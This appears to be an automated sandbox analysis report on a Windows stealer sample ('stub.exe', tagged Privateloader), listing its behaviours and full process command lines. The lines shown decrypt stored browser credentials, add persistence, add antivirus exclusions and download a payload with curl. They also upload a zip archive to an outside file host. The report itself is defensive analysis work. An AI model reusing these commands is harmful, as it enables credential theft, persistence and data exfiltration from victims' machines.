Analysis Overview
SHA256
6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef
Threat Level: Known bad
The file stub.exe was found to be: Known bad.
Malicious Activity Summary
Privateloader family
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
Looks up external IP address via web service
An obfuscated cmd.exe command-line is typically used to evade detection.
Enumerates physical storage devices
Unsigned PE
Creates scheduled task(s)
Detects videocard installed
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Enumerates processes with tasklist
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-09 15:04
Signatures
Privateloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-09 15:04
Reported
2024-05-09 15:06
Platform
win7-20240220-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\stub.exe
"C:\Users\Admin\AppData\Local\Temp\stub.exe"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-09 15:04
Reported
2024-05-09 15:06
Platform
win10v2004-20240426-en
Max time kernel
136s
Max time network
132s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\curl.exe | N/A |
| N/A | N/A | C:\Windows\system32\curl.exe | N/A |
| N/A | N/A | C:\Windows\system32\curl.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\stub.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cscript.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\stub.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\hKNCiITZVPAFxzH.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\stub.exe" | C:\Windows\system32\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\stub.exe
"C:\Users\Admin\AppData\Local\Temp\stub.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\olkgg0ws\olkgg0ws.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3CF9.tmp" "c:\Users\Admin\AppData\Local\Temp\olkgg0ws\CSCE254F21150E64C2A87A95ADCE1CA8C.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,92,189,224,153,149,154,254,15,90,25,191,67,109,35,188,255,47,151,9,21,172,109,172,152,78,250,241,191,140,181,162,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,235,215,220,194,5,197,88,53,204,186,212,66,146,226,188,79,204,39,241,55,33,198,3,57,197,104,32,254,164,222,53,48,0,0,0,190,0,161,123,65,14,46,171,239,38,157,125,28,95,192,236,16,13,130,184,221,191,110,38,80,70,146,60,47,32,10,203,90,20,66,70,106,81,223,50,206,68,184,16,75,136,60,134,64,0,0,0,70,232,28,94,65,45,27,44,230,217,177,254,232,17,18,175,206,168,72,136,197,118,127,130,242,66,19,188,10,231,102,228,166,149,101,103,226,180,241,31,220,52,111,182,118,173,9,121,124,121,42,179,127,86,97,46,106,209,100,22,161,216,139,82), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,92,189,224,153,149,154,254,15,90,25,191,67,109,35,188,255,47,151,9,21,172,109,172,152,78,250,241,191,140,181,162,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,235,215,220,194,5,197,88,53,204,186,212,66,146,226,188,79,204,39,241,55,33,198,3,57,197,104,32,254,164,222,53,48,0,0,0,190,0,161,123,65,14,46,171,239,38,157,125,28,95,192,236,16,13,130,184,221,191,110,38,80,70,146,60,47,32,10,203,90,20,66,70,106,81,223,50,206,68,184,16,75,136,60,134,64,0,0,0,70,232,28,94,65,45,27,44,230,217,177,254,232,17,18,175,206,168,72,136,197,118,127,130,242,66,19,188,10,231,102,228,166,149,101,103,226,180,241,31,220,52,111,182,118,173,9,121,124,121,42,179,127,86,97,46,106,209,100,22,161,216,139,82), $null, 'CurrentUser')
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,212,42,2,65,16,208,86,239,119,31,48,12,125,255,255,16,35,229,28,212,118,235,50,133,44,37,118,117,201,246,141,209,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,164,249,209,239,154,151,218,48,206,11,82,161,3,159,9,224,155,252,245,175,208,199,64,94,88,244,43,40,88,194,246,48,0,0,0,139,84,34,152,122,62,162,151,147,226,168,84,240,87,105,110,166,215,210,118,192,192,245,219,97,138,74,192,131,101,218,100,49,184,183,187,125,119,185,182,32,14,67,163,25,109,208,13,64,0,0,0,227,205,221,78,197,37,10,166,0,128,167,243,193,236,123,89,55,116,6,215,52,123,147,52,72,250,198,255,30,6,10,45,139,195,88,251,172,7,9,40,196,46,34,184,241,154,11,218,245,73,126,185,94,212,164,210,43,132,173,66,17,12,245,143), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,212,42,2,65,16,208,86,239,119,31,48,12,125,255,255,16,35,229,28,212,118,235,50,133,44,37,118,117,201,246,141,209,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,164,249,209,239,154,151,218,48,206,11,82,161,3,159,9,224,155,252,245,175,208,199,64,94,88,244,43,40,88,194,246,48,0,0,0,139,84,34,152,122,62,162,151,147,226,168,84,240,87,105,110,166,215,210,118,192,192,245,219,97,138,74,192,131,101,218,100,49,184,183,187,125,119,185,182,32,14,67,163,25,109,208,13,64,0,0,0,227,205,221,78,197,37,10,166,0,128,167,243,193,236,123,89,55,116,6,215,52,123,147,52,72,250,198,255,30,6,10,45,139,195,88,251,172,7,9,40,196,46,34,184,241,154,11,218,245,73,126,185,94,212,164,210,43,132,173,66,17,12,245,143), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jsxxoqjq\jsxxoqjq.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4508.tmp" "c:\Users\Admin\AppData\Local\Temp\jsxxoqjq\CSC5E3344A173974038A1E0272D1BF8B215.TMP"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\getmac.exe
getmac /NH
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\stub.exe" /f
C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Llxdhewc.zip";"
C:\Windows\system32\curl.exe
curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Llxdhewc.zip";
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
